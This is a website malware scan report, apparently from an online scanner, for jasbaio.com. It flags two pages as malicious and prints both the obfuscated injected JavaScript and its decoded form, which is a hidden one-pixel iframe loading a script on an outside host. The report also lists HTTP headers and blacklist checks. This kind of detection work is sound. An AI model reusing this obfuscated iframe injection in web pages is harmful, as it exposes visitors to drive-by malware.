Scanned pages/files
Request | Server response | Status |
http://jasbaio.com/ | 200 OK Content-Length: 14189 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ClgwzwPlDp='';var nVJN='';var sTIG='';var eJC='';var sFM='';var sYV;var qOR='';var oJT=false;var bRDM=false;sYV='%f4%e6%fa%eb%ee%f0%f7%e7%c3%83%cf%9e%a6%8b%89%f2%a4%b8%bf%97%cc%ba%98%9d%b4%e8%b8%bd%8e%90%ee%a1%bc%aa%81%85%b2%a9%b7%a2%81%c5%a6%bb%a8%a4%ab%e4%b4%aa%cc%97%9b%f7%9e%e3%a8%e2%a6%ba%ad%c3%95%89%a6%ff%f7%f6%f8%ed%f9%ae%ed%d8%c1%ef%ea%af%a4%a9%fd%fc%fb%e6%d7%c1%b7%8d%84%e8%f8%fc%ff%d2%cd%a7%a7%b1%e9%e1%eb%fb%ea%e6%d9%d4%ea%d3%d4%b7%a6%af%e0%d7%c4%a4%f9%80%e2%e2%fb%ea%93%98%a4%e9%e5%f5%d7 Decoded script: document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>'); document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>'); /*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */ <iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe> Antivirus reports:
| ||
http://jasbaio.com/index.html | 200 OK Content-Length: 14189 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ClgwzwPlDp='';var nVJN='';var sTIG='';var eJC='';var sFM='';var sYV;var qOR='';var oJT=false;var bRDM=false;sYV='%f4%e6%fa%eb%ee%f0%f7%e7%c3%83%cf%9e%a6%8b%89%f2%a4%b8%bf%97%cc%ba%98%9d%b4%e8%b8%bd%8e%90%ee%a1%bc%aa%81%85%b2%a9%b7%a2%81%c5%a6%bb%a8%a4%ab%e4%b4%aa%cc%97%9b%f7%9e%e3%a8%e2%a6%ba%ad%c3%95%89%a6%ff%f7%f6%f8%ed%f9%ae%ed%d8%c1%ef%ea%af%a4%a9%fd%fc%fb%e6%d7%c1%b7%8d%84%e8%f8%fc%ff%d2%cd%a7%a7%b1%e9%e1%eb%fb%ea%e6%d9%d4%ea%d3%d4%b7%a6%af%e0%d7%c4%a4%f9%80%e2%e2%fb%ea%93%98%a4%e9%e5%f5%d7 Decoded script: document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>'); document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>'); /*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */ <iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe> Antivirus reports:
| ||
http://jasbaio.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://jasbaio.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jasbaio.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 31 Mar 2014 00:04:59 GMT
Accept-Ranges: bytes
Age: 0
ETag: "376d-4759c5ca6ad43"
Server: Apache/2
Content-Length: 14189
Content-Type: text/html
Expires: Mon, 31 Mar 2014 01:04:59 GMT
Last-Modified: Sat, 10 Oct 2009 22:38:56 GMT
...14189 bytes of data.
GET / HTTP/1.1
Host: jasbaio.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 31 Mar 2014 00:04:59 GMT
Accept-Ranges: bytes
Age: 0
ETag: "376d-4759c5ca6ad43"
Server: Apache/2
Content-Length: 14189
Content-Type: text/html
Expires: Mon, 31 Mar 2014 01:04:59 GMT
Last-Modified: Sat, 10 Oct 2009 22:38:56 GMT
...14189 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jasbaio.com
Referer: http://www.google.com/search?q=jasbaio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jasbaio.com
Referer: http://www.google.com/search?q=jasbaio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jasbaio.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jasbaio.com/
Result: jasbaio.com is not infected or malware details are not published yet.
Result: jasbaio.com is not infected or malware details are not published yet.